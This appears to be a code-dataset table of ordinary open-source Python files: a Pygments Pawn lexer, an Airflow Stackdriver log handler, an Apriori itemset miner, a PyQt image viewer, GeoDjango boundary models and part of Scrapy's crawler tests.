repo_name | path | copies | size | content | license | hash | line_mean | line_max | alpha_frac | autogenerated | ratio | config_test | has_no_keywords | few_assignments |
---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
facelessuser/sublime-markdown-popups
|
st3/mdpopups/pygments/lexers/pawn.py
|
1
|
8073
|
# -*- coding: utf-8 -*-
"""
pygments.lexers.pawn
~~~~~~~~~~~~~~~~~~~~
Lexers for the Pawn languages.
:copyright: Copyright 2006-2015 by the Pygments team, see AUTHORS.
:license: BSD, see LICENSE for details.
"""
from ..lexer import RegexLexer
from ..token import Text, Comment, Operator, Keyword, Name, String, \
Number, Punctuation, Error
from ..util import get_bool_opt
__all__ = ['SourcePawnLexer', 'PawnLexer']
class SourcePawnLexer(RegexLexer):
"""
For SourcePawn source code with preprocessor directives.
.. versionadded:: 1.6
"""
name = 'SourcePawn'
aliases = ['sp']
filenames = ['*.sp']
mimetypes = ['text/x-sourcepawn']
#: optional Comment or Whitespace
_ws = r'(?:\s|//.*?\n|/\*.*?\*/)+'
#: only one /* */ style comment
_ws1 = r'\s*(?:/[*].*?[*]/\s*)*'
tokens = {
'root': [
# preprocessor directives: without whitespace
(r'^#if\s+0', Comment.Preproc, 'if0'),
('^#', Comment.Preproc, 'macro'),
# or with whitespace
('^' + _ws1 + r'#if\s+0', Comment.Preproc, 'if0'),
('^' + _ws1 + '#', Comment.Preproc, 'macro'),
(r'\n', Text),
(r'\s+', Text),
(r'\\\n', Text), # line continuation
(r'/(\\\n)?/(\n|(.|\n)*?[^\\]\n)', Comment.Single),
(r'/(\\\n)?\*(.|\n)*?\*(\\\n)?/', Comment.Multiline),
(r'[{}]', Punctuation),
(r'L?"', String, 'string'),
(r"L?'(\\.|\\[0-7]{1,3}|\\x[a-fA-F0-9]{1,2}|[^\\\'\n])'", String.Char),
(r'(\d+\.\d*|\.\d+|\d+)[eE][+-]?\d+[LlUu]*', Number.Float),
(r'(\d+\.\d*|\.\d+|\d+[fF])[fF]?', Number.Float),
(r'0x[0-9a-fA-F]+[LlUu]*', Number.Hex),
(r'0[0-7]+[LlUu]*', Number.Oct),
(r'\d+[LlUu]*', Number.Integer),
(r'\*/', Error),
(r'[~!%^&*+=|?:<>/-]', Operator),
(r'[()\[\],.;]', Punctuation),
(r'(case|const|continue|native|'
r'default|else|enum|for|if|new|operator|'
r'public|return|sizeof|static|decl|struct|switch)\b', Keyword),
(r'(bool|Float)\b', Keyword.Type),
(r'(true|false)\b', Keyword.Constant),
(r'[a-zA-Z_]\w*', Name),
],
'string': [
(r'"', String, '#pop'),
(r'\\([\\abfnrtv"\']|x[a-fA-F0-9]{2,4}|[0-7]{1,3})', String.Escape),
(r'[^\\"\n]+', String), # all other characters
(r'\\\n', String), # line continuation
(r'\\', String), # stray backslash
],
'macro': [
(r'[^/\n]+', Comment.Preproc),
(r'/\*(.|\n)*?\*/', Comment.Multiline),
(r'//.*?\n', Comment.Single, '#pop'),
(r'/', Comment.Preproc),
(r'(?<=\\)\n', Comment.Preproc),
(r'\n', Comment.Preproc, '#pop'),
],
'if0': [
(r'^\s*#if.*?(?<!\\)\n', Comment.Preproc, '#push'),
(r'^\s*#endif.*?(?<!\\)\n', Comment.Preproc, '#pop'),
(r'.*?\n', Comment),
]
}
SM_TYPES = set(('Action', 'bool', 'Float', 'Plugin', 'String', 'any',
'AdminFlag', 'OverrideType', 'OverrideRule', 'ImmunityType',
'GroupId', 'AdminId', 'AdmAccessMode', 'AdminCachePart',
'CookieAccess', 'CookieMenu', 'CookieMenuAction', 'NetFlow',
'ConVarBounds', 'QueryCookie', 'ReplySource',
'ConVarQueryResult', 'ConVarQueryFinished', 'Function',
'Action', 'Identity', 'PluginStatus', 'PluginInfo', 'DBResult',
'DBBindType', 'DBPriority', 'PropType', 'PropFieldType',
'MoveType', 'RenderMode', 'RenderFx', 'EventHookMode',
'EventHook', 'FileType', 'FileTimeMode', 'PathType',
'ParamType', 'ExecType', 'DialogType', 'Handle', 'KvDataTypes',
'NominateResult', 'MapChange', 'MenuStyle', 'MenuAction',
'MenuSource', 'RegexError', 'SDKCallType', 'SDKLibrary',
'SDKFuncConfSource', 'SDKType', 'SDKPassMethod', 'RayType',
'TraceEntityFilter', 'ListenOverride', 'SortOrder', 'SortType',
'SortFunc2D', 'APLRes', 'FeatureType', 'FeatureStatus',
'SMCResult', 'SMCError', 'TFClassType', 'TFTeam', 'TFCond',
'TFResourceType', 'Timer', 'TopMenuAction', 'TopMenuObjectType',
'TopMenuPosition', 'TopMenuObject', 'UserMsg'))
def __init__(self, **options):
self.smhighlighting = get_bool_opt(options,
'sourcemod', True)
self._functions = set()
if self.smhighlighting:
from pygments.lexers._sourcemod_builtins import FUNCTIONS
self._functions.update(FUNCTIONS)
RegexLexer.__init__(self, **options)
def get_tokens_unprocessed(self, text):
for index, token, value in \
RegexLexer.get_tokens_unprocessed(self, text):
if token is Name:
if self.smhighlighting:
if value in self.SM_TYPES:
token = Keyword.Type
elif value in self._functions:
token = Name.Builtin
yield index, token, value
class PawnLexer(RegexLexer):
"""
For Pawn source code.
.. versionadded:: 2.0
"""
name = 'Pawn'
aliases = ['pawn']
filenames = ['*.p', '*.pwn', '*.inc']
mimetypes = ['text/x-pawn']
#: optional Comment or Whitespace
_ws = r'(?:\s|//.*?\n|/[*][\w\W]*?[*]/)+'
#: only one /* */ style comment
_ws1 = r'\s*(?:/[*].*?[*]/\s*)*'
tokens = {
'root': [
# preprocessor directives: without whitespace
(r'^#if\s+0', Comment.Preproc, 'if0'),
('^#', Comment.Preproc, 'macro'),
# or with whitespace
('^' + _ws1 + r'#if\s+0', Comment.Preproc, 'if0'),
('^' + _ws1 + '#', Comment.Preproc, 'macro'),
(r'\n', Text),
(r'\s+', Text),
(r'\\\n', Text), # line continuation
(r'/(\\\n)?/(\n|(.|\n)*?[^\\]\n)', Comment.Single),
(r'/(\\\n)?\*[\w\W]*?\*(\\\n)?/', Comment.Multiline),
(r'[{}]', Punctuation),
(r'L?"', String, 'string'),
(r"L?'(\\.|\\[0-7]{1,3}|\\x[a-fA-F0-9]{1,2}|[^\\\'\n])'", String.Char),
(r'(\d+\.\d*|\.\d+|\d+)[eE][+-]?\d+[LlUu]*', Number.Float),
(r'(\d+\.\d*|\.\d+|\d+[fF])[fF]?', Number.Float),
(r'0x[0-9a-fA-F]+[LlUu]*', Number.Hex),
(r'0[0-7]+[LlUu]*', Number.Oct),
(r'\d+[LlUu]*', Number.Integer),
(r'\*/', Error),
(r'[~!%^&*+=|?:<>/-]', Operator),
(r'[()\[\],.;]', Punctuation),
(r'(switch|case|default|const|new|static|char|continue|break|'
r'if|else|for|while|do|operator|enum|'
r'public|return|sizeof|tagof|state|goto)\b', Keyword),
(r'(bool|Float)\b', Keyword.Type),
(r'(true|false)\b', Keyword.Constant),
(r'[a-zA-Z_]\w*', Name),
],
'string': [
(r'"', String, '#pop'),
(r'\\([\\abfnrtv"\']|x[a-fA-F0-9]{2,4}|[0-7]{1,3})', String.Escape),
(r'[^\\"\n]+', String), # all other characters
(r'\\\n', String), # line continuation
(r'\\', String), # stray backslash
],
'macro': [
(r'[^/\n]+', Comment.Preproc),
(r'/\*(.|\n)*?\*/', Comment.Multiline),
(r'//.*?\n', Comment.Single, '#pop'),
(r'/', Comment.Preproc),
(r'(?<=\\)\n', Comment.Preproc),
(r'\n', Comment.Preproc, '#pop'),
],
'if0': [
(r'^\s*#if.*?(?<!\\)\n', Comment.Preproc, '#push'),
(r'^\s*#endif.*?(?<!\\)\n', Comment.Preproc, '#pop'),
(r'.*?\n', Comment),
]
}
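# Usage sketch (illustrative, not part of the original module): assuming this file is
# importable as pygments.lexers.pawn and Pygments is installed, either lexer can be
# driven through the normal highlight() API. The SourcePawn snippet below is made up
# for demonstration purposes only.
#
#     from pygments import highlight
#     from pygments.formatters import TerminalFormatter
#     from pygments.lexers.pawn import SourcePawnLexer
#
#     code = 'public OnPluginStart() { new Float:x = 1.0; }'
#     print(highlight(code, SourcePawnLexer(sourcemod=True), TerminalFormatter()))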
|
mit
| -358,244,456,042,769,800 | 39.567839 | 84 | 0.445559 | false | 3.447054 | false | false | false |
wooga/airflow
|
airflow/utils/log/stackdriver_task_handler.py
|
1
|
11730
|
# Licensed to the Apache Software Foundation (ASF) under one
# or more contributor license agreements. See the NOTICE file
# distributed with this work for additional information
# regarding copyright ownership. The ASF licenses this file
# to you under the Apache License, Version 2.0 (the
# "License"); you may not use this file except in compliance
# with the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing,
# software distributed under the License is distributed on an
# "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
# KIND, either express or implied. See the License for the
# specific language governing permissions and limitations
# under the License.
"""
Handler that integrates with Stackdriver
"""
import logging
from typing import Dict, List, Optional, Tuple, Type
from cached_property import cached_property
from google.api_core.gapic_v1.client_info import ClientInfo
from google.cloud import logging as gcp_logging
from google.cloud.logging.handlers.transports import BackgroundThreadTransport, Transport
from google.cloud.logging.resource import Resource
from airflow import version
from airflow.models import TaskInstance
DEFAULT_LOGGER_NAME = "airflow"
_GLOBAL_RESOURCE = Resource(type="global", labels={})
class StackdriverTaskHandler(logging.Handler):
"""Handler that directly makes Stackdriver logging API calls.
This is a Python standard ``logging`` handler that can be used to
route Python standard logging messages directly to the Stackdriver
Logging API.
It can also be used to save logs for executing tasks. To do this, set it as a handler with
the name "tasks". In this case, it will also be used to read the logs for display in the Web UI.
This handler supports both an asynchronous and synchronous transport.
:param gcp_conn_id: Connection ID that will be used for authorization to the Google Cloud Platform.
If omitted, authorization based on `the Application Default Credentials
<https://cloud.google.com/docs/authentication/production#finding_credentials_automatically>`__ will
be used.
:type gcp_conn_id: str
:param name: the name of the custom log in Stackdriver Logging. Defaults
to 'airflow'. The name of the Python logger will be represented
in the ``python_logger`` field.
:type name: str
:param transport: Class for creating new transport objects. It should
extend from the base :class:`google.cloud.logging.handlers.Transport` type and
implement :meth:`google.cloud.logging.handlers.Transport.send`. Defaults to
:class:`google.cloud.logging.handlers.BackgroundThreadTransport`. The other
option is :class:`google.cloud.logging.handlers.SyncTransport`.
:type transport: :class:`type`
:param resource: (Optional) Monitored resource of the entry, defaults
to the global resource type.
:type resource: :class:`~google.cloud.logging.resource.Resource`
:param labels: (Optional) Mapping of labels for the entry.
:type labels: dict
"""
LABEL_TASK_ID = "task_id"
LABEL_DAG_ID = "dag_id"
LABEL_EXECUTION_DATE = "execution_date"
LABEL_TRY_NUMBER = "try_number"
def __init__(
self,
gcp_conn_id: Optional[str] = None,
name: str = DEFAULT_LOGGER_NAME,
transport: Type[Transport] = BackgroundThreadTransport,
resource: Resource = _GLOBAL_RESOURCE,
labels: Optional[Dict[str, str]] = None,
):
super().__init__()
self.gcp_conn_id = gcp_conn_id
self.name: str = name
self.transport_type: Type[Transport] = transport
self.resource: Resource = resource
self.labels: Optional[Dict[str, str]] = labels
self.task_instance_labels: Optional[Dict[str, str]] = {}
@cached_property
def _client(self) -> gcp_logging.Client:
"""Google Cloud Library API client"""
if self.gcp_conn_id:
from airflow.providers.google.common.hooks.base_google import GoogleBaseHook
hook = GoogleBaseHook(gcp_conn_id=self.gcp_conn_id)
credentials = hook._get_credentials() # pylint: disable=protected-access
else:
# Use Application Default Credentials
credentials = None
client = gcp_logging.Client(
credentials=credentials,
client_info=ClientInfo(client_library_version='airflow_v' + version.version)
)
return client
@cached_property
def _transport(self) -> Transport:
"""Object responsible for sending data to Stackdriver"""
return self.transport_type(self._client, self.name)
def emit(self, record: logging.LogRecord) -> None:
"""Actually log the specified logging record.
:param record: The record to be logged.
:type record: logging.LogRecord
"""
message = self.format(record)
labels: Optional[Dict[str, str]]
if self.labels and self.task_instance_labels:
labels = {}
labels.update(self.labels)
labels.update(self.task_instance_labels)
elif self.labels:
labels = self.labels
elif self.task_instance_labels:
labels = self.task_instance_labels
else:
labels = None
self._transport.send(record, message, resource=self.resource, labels=labels)
def set_context(self, task_instance: TaskInstance) -> None:
"""
Configures the logger to add information about the currently executed task.
:param task_instance: Currently executed task
:type task_instance: TaskInstance
"""
self.task_instance_labels = self._task_instance_to_labels(task_instance)
def read(
self, task_instance: TaskInstance, try_number: Optional[int] = None, metadata: Optional[Dict] = None
) -> Tuple[List[str], List[Dict]]:
"""
Read logs of given task instance from Stackdriver logging.
:param task_instance: task instance object
:type: task_instance: TaskInstance
:param try_number: task instance try_number to read logs from. If None
it returns all logs
:type try_number: Optional[int]
:param metadata: log metadata. It is used for streaming log reading and auto-tailing.
:type metadata: Dict
:return: a tuple of list of logs and list of metadata
:rtype: Tuple[List[str], List[Dict]]
"""
if try_number is not None and try_number < 1:
logs = ["Error fetching the logs. Try number {} is invalid.".format(try_number)]
return logs, [{"end_of_log": "true"}]
if not metadata:
metadata = {}
ti_labels = self._task_instance_to_labels(task_instance)
if try_number is not None:
ti_labels[self.LABEL_TRY_NUMBER] = str(try_number)
else:
del ti_labels[self.LABEL_TRY_NUMBER]
log_filter = self._prepare_log_filter(ti_labels)
next_page_token = metadata.get("next_page_token", None)
all_pages = 'download_logs' in metadata and metadata['download_logs']
messages, end_of_log, next_page_token = self._read_logs(log_filter, next_page_token, all_pages)
new_metadata = {"end_of_log": end_of_log}
if next_page_token:
new_metadata['next_page_token'] = next_page_token
return [messages], [new_metadata]
def _prepare_log_filter(self, ti_labels: Dict[str, str]) -> str:
"""
Prepares the filter that chooses which log entries to fetch.
More information:
https://cloud.google.com/logging/docs/reference/v2/rest/v2/entries/list#body.request_body.FIELDS.filter
https://cloud.google.com/logging/docs/view/advanced-queries
:param ti_labels: Task Instance's labels that will be used to search for logs
:type: Dict[str, str]
:return: logs filter
"""
def escape_label_key(key: str) -> str:
return f'"{key}"' if "." in key else key
def escape_label_value(value: str) -> str:
escaped_value = value.replace("\\", "\\\\").replace('"', '\\"')
return f'"{escaped_value}"'
log_filters = [
f'resource.type={escape_label_value(self.resource.type)}',
f'logName="projects/{self._client.project}/logs/{self.name}"'
]
for key, value in self.resource.labels.items():
log_filters.append(f'resource.labels.{escape_label_key(key)}={escape_label_value(value)}')
for key, value in ti_labels.items():
log_filters.append(f'labels.{escape_label_key(key)}={escape_label_value(value)}')
return "\n".join(log_filters)
def _read_logs(
self,
log_filter: str,
next_page_token: Optional[str],
all_pages: bool
) -> Tuple[str, bool, Optional[str]]:
"""
Sends requests to the Stackdriver service and downloads logs.
:param log_filter: Filter specifying the logs to be downloaded.
:type log_filter: str
:param next_page_token: The token of the page from which the log download will start.
If None is passed, it will start from the first page.
:param all_pages: If True is passed, all subpages will be downloaded. Otherwise, only the first
page will be downloaded
:return: A tuple that contains the following items:
* string with logs
* Boolean value describing whether there are more logs,
* token of the next page
:rtype: Tuple[str, bool, str]
"""
messages = []
new_messages, next_page_token = self._read_single_logs_page(
log_filter=log_filter,
page_token=next_page_token,
)
messages.append(new_messages)
if all_pages:
while next_page_token:
new_messages, next_page_token = self._read_single_logs_page(
log_filter=log_filter,
page_token=next_page_token
)
messages.append(new_messages)
end_of_log = True
next_page_token = None
else:
end_of_log = not bool(next_page_token)
return "\n".join(messages), end_of_log, next_page_token
def _read_single_logs_page(self, log_filter: str, page_token: Optional[str] = None) -> Tuple[str, str]:
"""
Sends requests to the Stackdriver service and downloads a single page of logs.
:param log_filter: Filter specifying the logs to be downloaded.
:type log_filter: str
:param page_token: The token of the page to be downloaded. If None is passed, the first page will be
downloaded.
:type page_token: str
:return: Downloaded logs and next page token
:rtype: Tuple[str, str]
"""
entries = self._client.list_entries(filter_=log_filter, page_token=page_token)
page = next(entries.pages)
next_page_token = entries.next_page_token
messages = []
for entry in page:
if "message" in entry.payload:
messages.append(entry.payload["message"])
return "\n".join(messages), next_page_token
@classmethod
def _task_instance_to_labels(cls, ti: TaskInstance) -> Dict[str, str]:
return {
cls.LABEL_TASK_ID: ti.task_id,
cls.LABEL_DAG_ID: ti.dag_id,
cls.LABEL_EXECUTION_DATE: str(ti.execution_date.isoformat()),
cls.LABEL_TRY_NUMBER: str(ti.try_number),
}
|
apache-2.0
| 2,753,684,676,931,630,600 | 40.013986 | 111 | 0.641347 | false | 4.085684 | false | false | false |
kagklis/Frequent-Itemset-Hiding-Toolbox-x86
|
Apriori.py
|
1
|
2242
|
#-------------------------------------------------------------------------------
# Name: Apriori.py
# Purpose: Mining Frequent Itemsets
# Author: Vasileios Kagklis
# Created: 10/02/2014
# Copyright: (c) Vasileios Kagklis
#-------------------------------------------------------------------------------
from __future__ import division, print_function
import os
from time import clock
from fim import apriori
from myiolib import readDataset
def printResults(fname, sup, Time, F, out_fname):
result_file=open(out_fname,'w')
visible_file=open('Apriori_visible.txt','w')
print('Apriori Execution',file=visible_file)
print('=================',file=visible_file)
print('Data Set from File:',fname,file=visible_file)
print('Support= ',sup,file=visible_file)
print('Frequent Itemsets ==> Support:',file=visible_file)
print('',file=visible_file)
print('Results:','\n',file=visible_file)
data_line=''
itemset_and_sup=''
Vis_itemset_and_sup=''
for itemset, support in F.items():
ItemSet=list(itemset)
ItemSet.sort()
for item in ItemSet:
data_line=data_line+item+' '
itemset_and_sup=data_line+(str(support))
Vis_itemset_and_sup=data_line+'==>'+(str(round(support,5)))
print(itemset_and_sup,file=result_file)
print(Vis_itemset_and_sup,file=visible_file)
data_line=''
itemset_and_sup=''
Vis_itemset_and_sup=''
print('Execution time= ',Time,file=visible_file)
visible_file.close()
result_file.close()
def convert2dic(F, N):
freq = {}
for itemset in F:
freq[frozenset(itemset[0])] = float(itemset[1][0]/N)
return freq
def convert2frozen_m(f):
result = []
for itemset in f:
result.append(frozenset(itemset[0]))
return(result)
def Apriori_main(data_fname, minSupport, out_fname='Apriori_results.txt'):
lines,tid = readDataset(data_fname)
t1=clock()
temp_freq = apriori(tid, target='s', supp=float(minSupport*100), conf=100)
CPU_time=clock()-t1
freq_items = convert2dic(temp_freq,lines)
printResults(data_fname,minSupport,CPU_time,freq_items,out_fname)
return(freq_items,CPU_time)
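# Usage sketch (illustrative, not part of the original script): given a transaction
# file readable by readDataset(), e.g. a hypothetical 'transactions.dat', the miner
# could be invoked as follows.
#
#     if __name__ == '__main__':
#         freq_items, cpu_time = Apriori_main('transactions.dat', 0.3)
#         print(len(freq_items), 'frequent itemsets found in', cpu_time, 's')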
|
mit
| -4,553,797,885,954,154,000 | 34.03125 | 80 | 0.591436 | false | 3.376506 | false | false | false |
chiahaoliu/2016_summer_XPD
|
XPD_view/XPD_view_1.py
|
1
|
6464
|
"""
This file will contain the code to create the XPD view GUI
"""
from xray_vision.qt_widgets import CrossSectionMainWindow
from PyQt4 import QtGui, QtCore
import os
import sys
import numpy as np
from Tif_File_Finder import TifFileFinder
from plot_analysis import reducedRepPlot
def data_gen(length):
x, y = [_ * 2 * np.pi / 200 for _ in np.ogrid[-200:200, -200:200]]
rep = int(np.sqrt(length))
data = []
for idx in range(length):
kx = idx // rep + 1
ky = idx % rep
data.append(np.sin(kx * x) * np.cos(ky * y) + 1.05)
return data
class Display(QtGui.QMainWindow):
def __init__(self):
QtGui.QMainWindow.__init__(self)
self.setWindowTitle('XPD View')
self.analysis_type = None
self.file_path = None
self.key_list = ['Home']
self.data_list = data_gen(1)
self.Tif = TifFileFinder()
self._main_window = CrossSectionMainWindow(data_list=self.data_list,
key_list=self.key_list,
cmap='RdBu')
self._main_window.setFocus()
self.setCentralWidget(self._main_window)
# set path option
setpath = QtGui.QAction("&Set Directory", self)
setpath.setShortcut("Ctrl+O")
setpath.setStatusTip("Set image directory")
setpath.triggered.connect(self.set_path)
# sets up refresh button
refresh = QtGui.QAction("&Refresh Files", self)
refresh.triggered.connect(self.refresh)
# set analysis type options
select_mean = QtGui.QAction("&mean", self)
select_mean.triggered.connect(self.set_type_mean)
select_std_dev = QtGui.QAction("&standard deviation", self)
select_std_dev.triggered.connect(self.set_type_stddev)
select_min = QtGui.QAction("&min", self)
select_min.triggered.connect(self.set_type_min)
select_max = QtGui.QAction("&max", self)
select_max.triggered.connect(self.set_type_max)
select_total_intensity = QtGui.QAction("&total intensity", self)
select_total_intensity.triggered.connect(self.set_type_total)
plt_action = QtGui.QAction("&Plot", self)
plt_action.triggered.connect(self.plot_analysis)
self.statusBar()
# This sets up all of the menu widgets that are used in the GUI
mainmenu = self.menuBar()
filemenu = mainmenu.addMenu("&File")
graph_menu = mainmenu.addMenu('&Reduced Representation')
analysis_submenu = QtGui.QMenu("analysis settings", graph_menu)
filemenu.addAction(setpath)
filemenu.addAction(refresh)
analysis_submenu.addAction(select_max)
analysis_submenu.addAction(select_min)
analysis_submenu.addAction(select_mean)
analysis_submenu.addAction(select_std_dev)
analysis_submenu.addAction(select_total_intensity)
graph_menu.addMenu(analysis_submenu)
graph_menu.addAction(plt_action)
self._main_window._messenger._ctrl_widget._spin_img.valueChanged.connect(self.thingy)
self.show()
def set_path(self):
popup = QtGui.QFileDialog()
self.file_path = str(popup.getExistingDirectory())
self.Tif._directory_name = self.file_path
self.Tif.get_file_list()
self.update_data(self.Tif.pic_list, self.Tif.file_list)
def set_type_mean(self):
self.analysis_type = "mean"
print("mean")
def set_type_min(self):
self.analysis_type = "min"
print("min")
def set_type_stddev(self):
self.analysis_type = "sigma"
print("sigma")
def set_type_max(self):
self.analysis_type = "max"
print("max")
def set_type_total(self):
self.analysis_type = "total intensity"
print("total intensity")
def plot_analysis(self):
try:
rpp = reducedRepPlot(self.data_list, 0, 400, 0, 400, self.analysis_type)
rpp.plot()
except NotADirectoryError:
print("exception excepted")
err_msg_file = QtGui.QMessageBox()
err_msg_file.setIcon(QtGui.QMessageBox.Critical)
err_msg_file.setWindowTitle("Error")
err_msg_file.setText("You did not specify a file path.")
err_msg_file.setInformativeText("click open to set the file path")
err_msg_file.setStandardButtons(QtGui.QMessageBox.Open)
err_msg_file.buttonClicked.connect(self.set_path)
err_msg_file.exec_()
except AssertionError:
err_msg_analysis = QtGui.QMessageBox()
err_msg_analysis.setIcon(QtGui.QMessageBox.Critical)
err_msg_analysis.setWindowTitle("Error")
err_msg_analysis.setText("You did not specify an analysis type")
err_msg_analysis.setInformativeText("please go to the menu and select an analysis type before proceeding")
err_msg_analysis.setStandardButtons(QtGui.QMessageBox.Close)
# err_msg_analysis.buttonClicked.connect(self.set_path)
err_msg_analysis.exec_()
def refresh(self):
new_file_names, new_data = self.Tif.get_new_files()
if len(new_file_names) == 0:
print("No new .tif files found")
else:
self.update_data(new_data, new_file_names)
def update_data(self, data_list, file_list):
# This method updates the data in the image displayer, taking in a new data list and another
# list that is normally the list of file names
old_length = len(self.key_list)
for file in file_list:
self.key_list.append(file)
for data in data_list:
self.data_list.append(data)
for i in range(old_length, len(self.key_list)):
self._main_window._messenger._view._data_dict[self.key_list[i]] = self.data_list[i]
self._main_window._messenger._ctrl_widget._slider_img.setMaximum(len(self.key_list) - 1)
self._main_window._messenger._ctrl_widget._spin_img.setMaximum(len(self.key_list) - 1)
def thingy(self, val):
print(val)
def main():
app = QtGui.QApplication(sys.argv)
viewer = Display()
sys.exit(app.exec_())
if __name__ == '__main__':
main()
|
bsd-2-clause
| -7,495,527,753,662,878,000 | 35.149425 | 118 | 0.603651 | false | 3.795655 | false | false | false |
hacklabr/geodjango-boundaries
|
boundaries/models.py
|
1
|
1543
|
# -*- coding: utf-8 -*-
from django.utils.encoding import python_2_unicode_compatible
from django.contrib.gis.db import models
@python_2_unicode_compatible
class NamedModel(models.Model):
name = models.CharField(max_length=255)
geometry = models.MultiPolygonField() # Multipolygon in NAD83
objects = models.GeoManager()
class Meta:
abstract = True
def __str__(self):
return self.name
class Country(NamedModel):
iso_code = models.CharField(max_length=4, blank=True)
class State(NamedModel):
label = models.CharField(max_length=255)
acronym = models.CharField(max_length=64, blank=True, null=True)
region = models.CharField(max_length=255, blank=True, null=True)
country = models.ForeignKey(Country)
class City(NamedModel):
label = models.CharField(max_length=255)
region = models.CharField(max_length=255, blank=True, null=True)
state = models.ForeignKey(State, blank=True, null=True)
country = models.ForeignKey(Country)
cities_ibge_mapping = {
'name': 'NOME_MUNIC',
'region': 'REGIão',
'state': {'acronym': 'SIGLA'},
'geometry': 'POLYGON',
}
# Mapping dictionaries for the models above.
state_ibge_mapping = {
'acronym': 'SIGLA',
'country': {'name': 'pais'},
# 'geometry': 'MULTIPOLYGON', # Will convert POLYGON features into MULTIPOLYGONS,
'geometry': 'POLYGON',
}
country_ibge_mapping = {
'name': 'name',
'geometry': 'POLYGON',
}
argentinian_cities_mapping = {
'name': 'FNA',
'geometry': 'POLYGON'
}
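# Import sketch (illustrative, not part of the original file): the mapping dicts above
# are shaped for django.contrib.gis.utils.LayerMapping; loading a states shapefile
# could look roughly like this, where 'estados.shp' is a placeholder path.
#
#     from django.contrib.gis.utils import LayerMapping
#     lm = LayerMapping(State, 'estados.shp', state_ibge_mapping, transform=True)
#     lm.save(strict=True, verbose=True)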
|
bsd-3-clause
| 5,712,905,196,875,916,000 | 23.870968 | 86 | 0.669909 | false | 3.330454 | false | false | false |
dangra/scrapy
|
tests/test_crawler.py
|
2
|
16388
|
import logging
import os
import platform
import subprocess
import sys
import warnings
from unittest import skipIf
from pytest import raises, mark
from testfixtures import LogCapture
from twisted.internet import defer
from twisted.trial import unittest
import scrapy
from scrapy.crawler import Crawler, CrawlerRunner, CrawlerProcess
from scrapy.settings import Settings, default_settings
from scrapy.spiderloader import SpiderLoader
from scrapy.utils.log import configure_logging, get_scrapy_root_handler
from scrapy.utils.spider import DefaultSpider
from scrapy.utils.misc import load_object
from scrapy.extensions.throttle import AutoThrottle
from scrapy.extensions import telnet
from scrapy.utils.test import get_testenv
from tests.mockserver import MockServer
class BaseCrawlerTest(unittest.TestCase):
def assertOptionIsDefault(self, settings, key):
self.assertIsInstance(settings, Settings)
self.assertEqual(settings[key], getattr(default_settings, key))
class CrawlerTestCase(BaseCrawlerTest):
def setUp(self):
self.crawler = Crawler(DefaultSpider, Settings())
def test_populate_spidercls_settings(self):
spider_settings = {'TEST1': 'spider', 'TEST2': 'spider'}
project_settings = {'TEST1': 'project', 'TEST3': 'project'}
class CustomSettingsSpider(DefaultSpider):
custom_settings = spider_settings
settings = Settings()
settings.setdict(project_settings, priority='project')
crawler = Crawler(CustomSettingsSpider, settings)
self.assertEqual(crawler.settings.get('TEST1'), 'spider')
self.assertEqual(crawler.settings.get('TEST2'), 'spider')
self.assertEqual(crawler.settings.get('TEST3'), 'project')
self.assertFalse(settings.frozen)
self.assertTrue(crawler.settings.frozen)
def test_crawler_accepts_dict(self):
crawler = Crawler(DefaultSpider, {'foo': 'bar'})
self.assertEqual(crawler.settings['foo'], 'bar')
self.assertOptionIsDefault(crawler.settings, 'RETRY_ENABLED')
def test_crawler_accepts_None(self):
crawler = Crawler(DefaultSpider)
self.assertOptionIsDefault(crawler.settings, 'RETRY_ENABLED')
def test_crawler_rejects_spider_objects(self):
with raises(ValueError):
Crawler(DefaultSpider())
class SpiderSettingsTestCase(unittest.TestCase):
def test_spider_custom_settings(self):
class MySpider(scrapy.Spider):
name = 'spider'
custom_settings = {
'AUTOTHROTTLE_ENABLED': True
}
crawler = Crawler(MySpider, {})
enabled_exts = [e.__class__ for e in crawler.extensions.middlewares]
self.assertIn(AutoThrottle, enabled_exts)
class CrawlerLoggingTestCase(unittest.TestCase):
def test_no_root_handler_installed(self):
handler = get_scrapy_root_handler()
if handler is not None:
logging.root.removeHandler(handler)
class MySpider(scrapy.Spider):
name = 'spider'
Crawler(MySpider, {})
assert get_scrapy_root_handler() is None
def test_spider_custom_settings_log_level(self):
log_file = self.mktemp()
class MySpider(scrapy.Spider):
name = 'spider'
custom_settings = {
'LOG_LEVEL': 'INFO',
'LOG_FILE': log_file,
# disable telnet if not available to avoid an extra warning
'TELNETCONSOLE_ENABLED': telnet.TWISTED_CONCH_AVAILABLE,
}
configure_logging()
self.assertEqual(get_scrapy_root_handler().level, logging.DEBUG)
crawler = Crawler(MySpider, {})
self.assertEqual(get_scrapy_root_handler().level, logging.INFO)
info_count = crawler.stats.get_value('log_count/INFO')
logging.debug('debug message')
logging.info('info message')
logging.warning('warning message')
logging.error('error message')
with open(log_file, 'rb') as fo:
logged = fo.read().decode('utf8')
self.assertNotIn('debug message', logged)
self.assertIn('info message', logged)
self.assertIn('warning message', logged)
self.assertIn('error message', logged)
self.assertEqual(crawler.stats.get_value('log_count/ERROR'), 1)
self.assertEqual(crawler.stats.get_value('log_count/WARNING'), 1)
self.assertEqual(
crawler.stats.get_value('log_count/INFO') - info_count, 1)
self.assertEqual(crawler.stats.get_value('log_count/DEBUG', 0), 0)
class SpiderLoaderWithWrongInterface:
def unneeded_method(self):
pass
class CustomSpiderLoader(SpiderLoader):
pass
class CrawlerRunnerTestCase(BaseCrawlerTest):
def test_spider_manager_verify_interface(self):
settings = Settings({
'SPIDER_LOADER_CLASS': SpiderLoaderWithWrongInterface,
})
with warnings.catch_warnings(record=True) as w:
self.assertRaises(AttributeError, CrawlerRunner, settings)
self.assertEqual(len(w), 1)
self.assertIn("SPIDER_LOADER_CLASS", str(w[0].message))
self.assertIn("scrapy.interfaces.ISpiderLoader", str(w[0].message))
def test_crawler_runner_accepts_dict(self):
runner = CrawlerRunner({'foo': 'bar'})
self.assertEqual(runner.settings['foo'], 'bar')
self.assertOptionIsDefault(runner.settings, 'RETRY_ENABLED')
def test_crawler_runner_accepts_None(self):
runner = CrawlerRunner()
self.assertOptionIsDefault(runner.settings, 'RETRY_ENABLED')
def test_deprecated_attribute_spiders(self):
with warnings.catch_warnings(record=True) as w:
runner = CrawlerRunner(Settings())
spiders = runner.spiders
self.assertEqual(len(w), 1)
self.assertIn("CrawlerRunner.spiders", str(w[0].message))
